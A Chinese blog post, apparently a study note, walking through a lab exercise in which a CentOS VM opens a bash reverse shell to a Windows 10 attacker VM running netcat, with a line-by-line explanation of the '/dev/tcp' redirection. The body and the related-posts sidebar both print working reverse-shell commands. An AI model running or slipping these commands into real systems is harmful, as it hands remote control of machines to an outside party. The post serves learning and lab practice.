【shell编程学习】反弹shell

已于 2023-05-23 16:16:20 修改
阅读量729 收藏 4
点赞数
文章标签: 学习 linux 服务器
于 2023-05-23 16:15:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuxuan89814/article/details/130828924
版权

反弹实验

机器IP
win10虚拟机192.168.242.129攻击机
centos 虚拟机192.168.242.131靶机

1,win10机器安装Ncat 来监听端口

简单来说,就是下载netcat 安装包,解压,将nc.exe 复制到C:\Windows\System32的文件夹下。即可使用nc命令来监听端口。

 windows环境下nc全称netcat 安装及使用 - 疯狂の猿猴 

监听命令:nc -lvvp 9002 

nc -lvvp 9002

2,在靶机器上下反弹shell命令

bash -i >&/dev/tcp/192.168.242.129/9002 0>&1

 

3,在攻击机(win10)上控制靶机(centos机器)

反弹shell就是让靶机的控制权通过shell命令交给控制机。

 

反弹shell解析

 bash -i >&/dev/tcp/192.168.242.129/9002 0>&1

bash -i 是产生交互式的shell

/dev/tcp/192.168.242.129/9002  /dev/tcp/ip/port 这是一个特殊文件,它会建立一个连接到192.168.242.129:9002的socket

>& 是将标准输出1重定位到后面这个文件中,即socket中

0>&1是将标准输入0重定位到标准输出1中,而标准输出1又重新定位到了socket。所以攻击机中既能输入命令又能展示命令结果

小小鱼er
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shell编程学习资料
05-09
shell编程学习资料
shell编程学习(个人学习记录).md
02-08
shell编程学习(个人学习记录).md
渗透测试-window反弹shell
lza20001103的博客
05-11 3880
window反弹shell
linux反弹shell方法
weixin_53747497的博客
07-12 1675
被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i : 打开一个交互式的bash shell/dev/tcp/IP/PORT : /dev/tcp/是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出,为了确保命令执行后的输入被正确的传回攻击机。
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 1931
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell
反弹shell的各种姿势(linux与windows)
weixin_42478365的博客
06-19 791
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。所有姿势整理自网络,假设,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。 Linux 反弹shell 姿势一:bash反弹 bash -i >& /dev/tcp/192.168.99.242/1234 0>&1 base64版:bash -
反弹shell总结
weixin_51692662的博客
11-10 1049
反弹shell
LinuxShell编程学习
最新发布
09-09
Linux系统中,虽然有各种...Shell不仅仅是命令的收集,而且是一门非常棒的编程语言。您可以通过使用shell使大量的任务自动化,shell特别擅长系统管理任务,尤其适合那些易用性、可维护性和便携性比效率更重要的任务。
Linux shell 编程学习笔记
01-07
一直以来都很像系统的学习一下 shell 脚本,以便方便的高效的管理服务器。 这次难得有时间和条件来学习,所以做好笔记。 一:shell 能做什么  二:shell 脚本的几种执行方式,我们创建文件 start.sh,并且赋予 ...
Shell脚本编程100例
01-07
Shell脚本编程100例。 融汇 shell 脚本知识点,集大成之作。 本书实在是学习、进修、面试、居家旅行必备精品!
windows 反弹shell_反弹shell的各种姿势
weixin_39800331的博客
11-27 409
来自公众号:Bypass在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。本文所有姿势整理自网络,并基于同一个假设的前提下完成测试和验证。(假设:攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。)Linu...
windows 反弹shell_原创干货 | windows反弹shell小结
weixin_39533896的博客
11-19 1100
前言本文是att&ck Command-Line Interface的展开篇平时遇到rce的漏洞,我们通常会弹一个shell给自己,(提权,内网渗透,搭建跳板,等等)linux反弹shell得益于命令行特别友好,所以我们可以非常简单地就可以把shell弹出来,比如使用bash,perl,python,nc,获得shell的原理其实就是建立了一个socket通道,那么今天我们来看看...
windows反弹shell复现
就是我的博客
04-06 9539
windows反弹shell 简介: reverse shell反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell类似,本质上是网络概念的客户端与服务端的角色反转,就是让目标机执行反向连接攻击机。 在实战中多配置命令执行等漏洞进行使用。 环境: 攻击机:IP为192.168.1.111,系统信息 Linux kali 5.10.0-kali3-amd6...
常见的反弹shell的方法以及对反弹shell的解释
热门推荐
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1237
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
网络安全-木马入侵windows -msfvenom反弹shell(CMD)
weixin_48137911的博客
02-19 5498
需要做什么呢漏洞与木马的区别在于漏洞是某个系统某个框架,才能用特定的环境下才可以但是木马是全部机器都可以用因为木马相当于软件如果你电脑不能安装软件那你这个电脑也没啥用。
Window下的反弹shell
qq_58000413的博客
05-05 1084
什么是正向shell?正向shell:控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell:被控制端主动发起连接去请求连接控制,通常被控端由于防火墙受限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。
反弹shell与提权】
一纸荒芜的博客
08-01 1808
网安面试常见问题
反弹shell汇总,看我一篇就够了
LainWith的博客
12-26 8107
反弹shell 知识铺垫 什么是shell shell是渗透中常用的名词,像getshell,webshell反弹shell等等,都和shell相关。 getshell:获取到目标的命令执行权限 webshell:指网站后门,通过web服务进行命令执行 反弹shell:把命令行的输入输出转移到其它主机 Shell 俗称壳(用来区别于核),是指“为使用者提供操作界面”的软件(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后调用相应的应用程序。简单说用户通
shell脚本编程学习
07-27
学习shell脚本编程可以通过以下步骤进行: 1. 了解shell脚本的基本概念和用途。Shell脚本是一种用于自动化执行一系列命令的脚本语言,可以用于编写各种任务和脚本程序。 2. 选择一个适合的文本编辑器,比如vi、vim、nano等,用于编写shell脚本。 3. 选择一个合适的shell解释器,常见的有Bourne Shell、Bourne Again Shell、C Shell、K Shell等。其中,Bourne Again Shell(/bin/bash)是最常用的shell解释器。 4. 学习shell脚本的基本语法和常用命令。可以通过阅读相关的教程、书籍或在线资源来学习。 5. 编写第一个简单的shell脚本。可以创建一个新的文件,使用文本编辑器编写脚本代码,然后保存为.sh文件。例如,可以创建一个名为hello.sh的脚本文件,内容如下: ``` #!/bin/bash echo -e "This is a test" ``` 6. 为脚本文件添加执行权限。使用chmod命令给脚本文件添加可执行权限,例如: ``` chmod +x hello.sh ``` 7. 运行脚本。使用./命令来运行脚本,例如: ``` ./hello.sh ``` 这样就可以执行hello.sh脚本,并在终端输出"This is a test"的内容。 通过以上步骤,你可以开始学习和编写shell脚本,并逐渐掌握更多的语法和技巧来完成各种任务和自动化操作。引用\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* *3* [shell脚本学习教程(全网最全教学)](https://blog.csdn.net/cxb14897/article/details/124951398)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [Shell编程入门学习](https://blog.csdn.net/hkdhkdhkd/article/details/115617476)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值